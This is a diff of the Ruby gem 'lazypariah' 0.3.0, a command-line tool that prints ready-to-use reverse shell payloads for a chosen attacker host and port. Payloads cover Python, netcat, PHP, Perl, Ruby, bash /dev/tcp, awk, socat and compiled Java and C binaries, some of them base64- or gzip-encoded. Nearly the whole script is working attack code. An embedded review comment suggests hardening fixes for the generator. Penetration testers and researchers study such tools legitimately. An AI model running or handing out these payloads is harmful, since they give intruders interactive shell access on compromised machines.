lazypariah 0.3.0



Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/bin/lazypariah +294 -0
  3. metadata +51 -0
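--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA256:
+metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
+data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
+SHA512:
+metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
+data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532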
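--- a/data/bin/lazypariah
+++ b/data/bin/lazypariah
@@ -0,0 +1,294 @@
+#!/usr/bin/env ruby
+#
+# Title: LAZYPARIAH
+# Version: 0.3.0
+# Description:
+# LAZYPARIAH is a simple tool for generating various reverse shell payloads
+# on the fly. It is intended to be used only in authorised circumstances by
+# qualified penetration testers, security researchers and red team professionals.
+#
+# Copyright (C) 2020 Peter Bruce Funnell
+#
+# This program is free software: you can redistribute it and/or modify it under the terms of the GNU
+# General Public License as published by the Free Software Foundation, either version 3 of the License,
+# or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
+# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
+# License for more details.
+#
+# You should have received a copy of the GNU General Public License along with this program. If not,
+# see <https://www.gnu.org/licenses/>.
+
+# Load the necessary gems.
+require "base64"
+require "optparse"
+require "erb"
+require "zlib"
+require "stringio"
+
+# Define constants.
+PROGRAM_NAME = "LAZYPARIAH".freeze()
+PROGRAM_VERSION = "0.3.0".freeze()
+EXECUTABLE_NAME = "lazypariah".freeze()
+
+# Define payload list.
+PAYLOAD_LIST = [
+"python",
+"python3_c",
+"python2_c",
+"python_c",
+"python3_b64",
+"python2_b64",
+"python_b64",
+"nc",
+"nc_pipe",
+"php_fd_3",
+"php_fd_4",
+"php_fd_5",
+"php_fd_6",
+"php_fd_3_c",
+"php_fd_4_c",
+"php_fd_5_c",
+"php_fd_6_c",
+"php_fd_3_tags",
+"php_fd_4_tags",
+"php_fd_5_tags",
+"php_fd_6_tags",
+"perl",
+"perl_c",
+"ruby",
+"ruby_c",
+"ruby_b64",
+"bash_tcp",
+"awk",
+"socat",
+"java_class_binary",
+"java_class_b64",
+"java_class_gzip_b64",
+"c_binary",
+"c_binary_b64",
+"c_binary_gzip",
+"c_binary_gzip_b64"
+].sort()
+
+# Define function for displaying program information.
+def prog_info(donation_info=true)
+puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
+puts("Copyright (C) 2020 Peter Bruce Funnell")
+if donation_info
+puts("\nBTC Donation Address (Author): 3EdoXV1w8H7y7M9ZdpjRC7GPnX4aouy18g")
+end
+end
+
+# Initialise command line argument parser.
+option_parser = OptionParser.new do |options|
+options.banner = "\nUsage:\t#{EXECUTABLE_NAME} [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>\n"
+options.banner << "Note:\t<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.\n\n"
+options.banner << "Example:\tlazypariah -u python3_b64 10.10.14.4 1555\n"
+options.banner << "Example:\tlazypariah python2_c malicious.local 1337\n\n"
+options.banner << "Valid Payloads:\n"
+PAYLOAD_LIST.each do |p|
+options.banner << "#{" "*4}#{p}\n"
+end
+options.banner << "\nValid Options:\n"
+options.on("-h", "--help", "Display help text and exit.")
+options.on("-l", "--license", "Display license information and exit.")
+options.on("-u", "--url", "URL-encode the payload.")
+options.on("-v", "--version", "Display version information and exit.\n\n")
+end
+
+# Define port_check method for strings.
+class String
+def port_check()
+(self.to_i.to_s == self) and (self.to_i >= 0 and self.to_i <= 65535)
+end
+end
+
+# Define print_output.
+def print_output(s, url_encode=false)
+if url_encode
+print(ERB::Util.url_encode(s))
+else
+print(s)
+end
+end
+
+# Attempt to parse command line arguments.
+begin
+arguments = Hash.new()
+option_parser.parse!(into: arguments)
+if arguments[:version]
+prog_info(donation_info=false)
+exit()
+else
+if arguments.length < 1 and ARGV.length < 1
+prog_info()
+puts("\nNo command line arguments were detected. Please consult the help text below for details on how to use #{PROGRAM_NAME}.\n")
+puts(option_parser)
+exit()
+elsif arguments[:help]
+prog_info()
+puts(option_parser)
+exit()
+elsif arguments[:license]
+prog_info(donation_info=false)
+puts("\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>.")
+elsif ARGV.length < 3
+prog_info()
+puts("\nThe command line arguments given to #{PROGRAM_NAME} were insufficient. #{PROGRAM_NAME} requires a payload type, attacker IP address and an attacker port in order to generate a reverse shell payload.\n")
+puts(option_parser)
+exit()
+elsif ARGV.length > 3
+prog_info()
+puts("\nToo many command line arguments were given to #{PROGRAM_NAME}.\n")
+puts(option_parser)
+exit()
+elsif not PAYLOAD_LIST.include?(ARGV[0])
+prog_info()
+puts("\n#{PROGRAM_NAME} did not recognise the specified payload. Please consult the valid list of payloads below.\n")
+puts(option_parser)
+exit()
+elsif not ARGV[2].port_check()
+prog_info()
+puts("\nThe specified port was invalid. Please specify a port between 0 and 65535 (inclusive).\n\n")
+else
+url_encode = arguments[:url] ? true: false
+case ARGV[0]
+when "python"
+print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode)
+when "python3_c"
+print_output("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
+when "python2_c"
+print_output("python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
+when "python_c"
+print_output("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
+when "python3_b64"
+code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
+when "python2_b64"
+code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
+when "python_b64"
+code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
+when "nc"
+print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
+when "nc_pipe"
+print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
+when "php_fd_3"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");", url_encode=url_encode)
+when "php_fd_4"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");", url_encode=url_encode)
+when "php_fd_5"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");", url_encode=url_encode)
+when "php_fd_6"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");", url_encode=url_encode)
+when "php_fd_3_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", url_encode=url_encode)
+when "php_fd_4_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");'", url_encode=url_encode)
+when "php_fd_5_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");'", url_encode=url_encode)
+when "php_fd_6_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");'", url_encode=url_encode)
+when "php_fd_3_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");?>", url_encode=url_encode)
+when "php_fd_4_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");?>", url_encode=url_encode)
+when "php_fd_5_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
+when "php_fd_6_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
+when "perl"
+print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
+when "perl_c"
+print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
+when "ruby"
+print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
+when "ruby_c"
+print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
+when "ruby_b64"
+code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
+print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
+when "bash_tcp"
+print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
+when "awk"
+print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
+when "socat"
+print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
+when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
+code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.java"
+
+system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
+
+File.open(temp_dir+"/rs.class", "r") do |f|
+java_payload = f.read()
+case ARGV[0]
+when "java_class_binary"
+print_output(java_payload)
+when "java_class_b64"
+java_payload_b64 = Base64.strict_encode64(java_payload)
+print_output(java_payload_b64, url_encode=url_encode)
+when "java_class_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(java_payload)
+gz.close()
+java_payload_gzip = sio.string
+java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
+print_output(java_payload_gzip_b64, url_encode=url_encode)
+end
+end
+
+system("rm -r #{temp_dir}")
+when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
+code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.c"
+
+system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
+
+File.open(temp_dir+"/rs", "r") do |f|
+binary_payload = f.read()
+case ARGV[0]
+when "c_binary"
+print_output(binary_payload)
+when "c_binary_b64"
+binary_payload_b64 = Base64.strict_encode64(binary_payload)
+print_output(binary_payload_b64)
+when "c_binary_gzip"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+print_output(binary_payload_gzip, url_encode)
+when "c_binary_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
+print_output(binary_payload_gzip_b64, url_encode=url_encode)
+end
+end
+
+system("rm -r #{temp_dir}")
+end
+end
+end
+rescue OptionParser::InvalidOption, OptionParser::MissingArgument
+# Invalid command line arguments were detected. Say so, display the help text, and exit.
+puts("\nOne or more command line arguments were invalid.\n")
+puts(option_parser)
+exit()
+end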
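Review bot: The Java and C branches build the compile step as a single shell string, `system("echo '#{code}' > #{temp_file}; javac #{temp_file};")` (and the `gcc` twin), where `code` embeds `ARGV[1]` — the one positional argument that, unlike the port, is never validated — so any quote in it breaks out of the `echo '…'` and changes what the shell runs, and the `system("rm -r #{temp_dir}")` cleanup is skipped whenever the compiler is missing or fails because `File.open` raises `Errno::ENOENT` first and nothing runs in an `ensure`. Writing the source with `File.write`, invoking the compiler in argv form (`system("javac", temp_file)`, no shell involved) and checking its return value, and wrapping the whole branch in `Dir.mktmpdir` (stdlib `tmpdir`) with a block removes the shell from the path and guarantees the directory is removed on every exit; the class/ELF file should also be opened with `"rb"` rather than `"r"`. Separately, `print_output(java_payload)`, `print_output(binary_payload_b64)` and the `socat` branch omit `url_encode`, so `-u` is silently ignored for those payloads. The sketch below is for the Java branch; the C branch needs the same treatment.
```ruby
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
  # … unchanged: code = "import java.io.IOException; …" …
  Dir.mktmpdir("lazypariah_") do |temp_dir|
    temp_file = File.join(temp_dir, "rs.java")
    File.write(temp_file, code)
    # argv form: the host/port strings never reach a shell
    abort("javac failed; is a JDK installed?") unless system("javac", temp_file)
    File.open(File.join(temp_dir, "rs.class"), "rb") do |f|
      # … unchanged: java_payload read, b64/gzip encoding and print_output calls …
    end
  end  # temp_dir is removed here even if javac or File.open raised
```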
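--- a/metadata
+++ b/metadata
@@ -0,0 +1,51 @@
+--- !ruby/object:Gem::Specification
+name: lazypariah
+version: !ruby/object:Gem::Version
+version: 0.3.0
+platform: ruby
+authors:
+- Peter Funnell
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2020-11-23 00:00:00.000000000 Z
+dependencies: []
+description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
+on the fly. It is intended to be used only in authorised circumstances by qualified
+penetration testers, security researchers and red team professionals. Before downloading,
+installing or using this tool, ensure that you understand the relevant laws in your
+jurisdiction. The author of this tool does not endorse the usage of this tool for
+illegal or unauthorised purposes.
+email: hello@octetsplicer.com
+executables:
+- lazypariah
+extensions: []
+extra_rdoc_files: []
+files:
+- bin/lazypariah
+homepage: https://github.com/octetsplicer/LAZYPARIAH
+licenses:
+- GPL-3.0+
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: 2.7.1
+required_rubygems_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+requirements:
+- A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
+and OpenJDK (for Java payloads).
+rubygems_version: 3.1.2
+signing_key:
+specification_version: 4
+summary: A tool for generating reverse shell payloads on the fly.
+test_files: []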